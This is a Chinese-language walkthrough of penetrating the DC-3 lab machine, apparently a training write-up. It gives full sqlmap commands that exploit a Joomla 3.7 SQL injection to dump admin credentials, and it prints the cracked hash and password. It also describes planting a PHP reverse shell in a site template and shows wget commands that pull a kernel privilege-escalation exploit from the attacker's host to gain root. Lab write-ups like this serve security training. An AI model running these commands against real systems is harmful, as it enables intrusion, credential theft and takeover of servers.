DC-3渗透实战

今后的靶机渗透，我尽量简单化，一些繁琐的过程我就不写出来了
直接写主要的步骤和想法思路

靶机IP：192.168.56.101

web渗透

http://192.168.56.101/administrator
发现是joomla建站
不想爆破了，发现了暴露出该cms的版本信息
http://192.168.56.101/README.txt

image.png

sql注入

不想盲测，直接上kali中search一下poc

searchsploit joomla 3.7

image.png

判断出有注入点，且注入点已知。直接跑跑sqlmap

注入语句：

1、爆库

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

image.png

2、爆表

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

image.png

3、爆字段数据

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

image.png

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' --dump -p list[fullorde
ring]

image.png

拿到了admin用户的密码hash

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

拿去md5解不出来，试试john爆解

john解hash

john hash

image.png

登录后台试试，成功登录

口令是：

admin   snoopy


后台反弹getshell

进入后台后，选择Templates模板，选择templates第一个模板即可，在index.php页面中添加php反弹马

image.png

kali中开启监听

image.png

反弹成功

提权

先查看下该靶机的系统版本信息

image.png

老系统，也许有漏洞

随便拿一个试试

image.png

这个不行，再试试下一个

试了几个，发现这个可以

image.png

下载到靶机上

image.png

wget http://192.168.56.102/39772/compile.sh  
wget http://192.168.56.102/39772/doubleput.c  
wget http://192.168.56.102/39772/hello.crm
wget http://192.168.56.102/39772/suidhelper.c

之后

 ./compile.sh
 ./doubleput

拿到root权限

image.png

get flag

image.png

总结

1、发现了cms建站，注意版本等信息，可以直接找cms漏洞
2、进入后台，joomla直接上反弹马getshell
3、提权就比较难了，也是参照 国外的大牛的方法

靶机百度云下载
链接：https://pan.baidu.com/s/1al4ls7lx8zVq6s--Ik3RcQ
提取码：lbi4